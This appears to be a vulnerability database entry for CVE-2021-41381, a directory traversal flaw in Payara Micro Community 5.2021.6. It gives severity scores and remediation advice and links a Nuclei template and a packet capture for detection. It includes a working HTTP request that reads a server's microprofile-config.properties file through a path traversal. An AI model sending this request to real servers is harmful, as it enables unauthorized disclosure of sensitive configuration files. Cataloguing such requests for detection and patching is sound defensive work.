🔙 목록으로 돌아가기

CVE-2021-41381: Payara Micro Community 5.2021.6 Directory Traversal

TitlePayara Micro Community 5.2021.6 Directory Traversal
Authorpikpikcu
SeverityHigh
ImpactAn attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
RemediationUpgrade to a patched version of Payara Micro Community or apply the necessary security patches to mitigate the directory traversal vulnerability.
CVSS Score7.5
EPSS Score0.80779
CVE IDCVE-2021-41381
CWE IDCWE-22
Tags cve2021 cve payara lfi packetstorm vuln

🔍 Vulnerability Description

Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.

🌐 HTTP Request

GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-41381.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-41381.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A